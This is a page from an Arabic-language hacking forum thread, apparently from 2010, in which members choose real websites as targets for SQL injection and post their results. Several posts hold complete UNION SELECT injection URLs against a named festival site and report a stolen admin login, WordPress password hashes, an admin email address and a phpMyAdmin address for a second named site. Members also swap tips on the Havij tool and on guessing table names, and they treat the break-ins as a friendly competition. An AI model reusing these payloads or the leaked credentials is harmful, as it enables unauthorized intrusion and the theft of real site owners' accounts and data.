التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات
تحديث الصفحة غرفة حقن قواعد البيانات {غرفة Sql }
التعليمات التقويم مشاركات اليوم البحث

موضوع مغلق
صفحة 12 من 27 « الأولى 21011 12 131422 الأخيرة »
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-06-2010, 12:17 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 
 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road
افتراضي

[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]



التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-06-2010, 03:58 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Master vbspiders
 

 
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road
Post

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Syst3m-32
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]


[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن...
+
بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة
تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة
تحياتي

[/align]
التوقيع

^_^

 

   

قديم 08-06-2010, 05:19 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Syst3m-32
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

هل حقنت الموقع الأول ب havij أخي system-32
التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:21 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

الهدف الجديد


كود:
www.imagesfestival.com
التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:30 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
smilies12
:a04:




التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 05:56 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 
 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road
افتراضي

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo
الهدف الجديد


كود:
www.imagesfestival.com


أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟

لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى

إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه

ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL

لكن لما نكون حقناه نعطيه الحل و يستفيد
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

التعديل الأخير تم بواسطة TIKTAKram ; 08-06-2010 الساعة 05:59 PM.

   

قديم 08-06-2010, 04:11 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 
 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road
افتراضي

هذا أجمل شئ سمعته هذا اليوم.

التوقيع

 

   

قديم 08-06-2010, 05:16 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

m0h@med شكرا أخي m0h@med على التوضيح
و الله أفدتني بخصوص concat_ws كثيرا
وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 06:22 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

حقنتو يا غالي Syst3m-32
ويدويا

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 07:17 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 
 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road
افتراضي

يا دارك ليش ما قلت لي أنه WordPress ؟؟؟

جعلتني أظهر كأنني لم أستطع حقن الموقع

تم الحقن بنجاح بعد معرفة السكربت WordPress

إسم الجدول : wp_users

إسم عمود اليوزر : user_login

إسم عمود الباسوارد : user_pass

يوزر الأدمن : admin

باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1

بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress

و هذه الحقنة كاملة :

كود:
 http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users--
بالنسبة للوحة التحكم لو تتذكر يا دارك يا مشاكس كم حكينا عنها تظهر لك أني نسيت الموقع ؟؟ هههه

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-06-2010, 07:21 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 
 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road
افتراضي

اقتباس
بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور

أهلا أخي الكريم

بصراحة و الله العظيم أنا لا أعمل ببرامج الحقن

أعتمد بنسبة 90% على الحقن اليدوي

فقط في بعض الحالات أين يصعب الحقن اليدوي و ما يقارب 10%

بالنسبة للبرنامج الذي أعمل به هو : Havij 1.10

برنامج قوي الأكثر شهرة في هذا المجال و بصراحة من جهتي هو برنامج قوي جدا و رائع

إلى أن في بعض الحالات الحقن اليدوي يغلبه كالحالة التي قبل هذه المشاركة بالضبط

و أي مساعدة أنا هنا

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-06-2010, 07:10 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية عبد الله ر
 

 
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road
افتراضي

اقتباس
تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر

:a04:

مشكور اخي العزيز ooooo_darkman_ooooo
ولو هذا واجبنا
بالنسبة للموقع : www.imagesfestival.com
والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه
بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول
مشكور على التقييم

بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور
التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

قديم 08-06-2010, 07:21 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

system-32
هههههههههههههههههههههههههههههههههههههه
الحمد لله أنك قمت بالتذكر
هههههههههههههههههههههههه
عندي 1 ساعة و أنا أنتظر تقولهالي
ههههههههههههههههههههههههههههههه
لكن في النهاية قمت بالمطلوب يا خبير
تستاهل تكون مشرف
ههههههههههههههههههههه
واصل العمل
+ عمل ممتاز
+ أنا حقنت الموقع لكن و الله ما عرفت أنو مركب سكربت wordpress
ههههههههههههههه
لكني حقنته
من الخبير الآن
هههههههههههههههههههههههههههههه

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 07:25 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

Syst3m-32
=============
هل عرفت أن السكربت وورد بريس من إسم الجدول أم ماذا ؟؟؟؟؟؟؟؟

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

قديم 08-06-2010, 07:28 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 
 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road
افتراضي

أخي system-32
لاحظ حقنة المحترفين وقولي ماهو الشيئ المضاف على حقنتك من حيث ناتج الإستعلامات
ههههههههههههههههههههههههههههه

كود:
http://www.imagesfestival.com/call.php?id=-8%20union%20select%201,2,3,4,5,6,7,8,concat%28user_login,0x3a,0x3a,user_pass%29,10,11%20from%20wp_users--
التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

موضوع مغلق
صفحة 12 من 27 « الأولى 21011 12 131422 الأخيرة »

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
العدد (3) من غرفة الحقن darkman.dz SQL قواعد البيانات 397 12-30-2010 01:23 PM
جهاز من غرفة جـنـسـيـة MasTer MiND Hackers Showoff 6 06-25-2009 04:01 PM


الساعة الآن 01:30 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0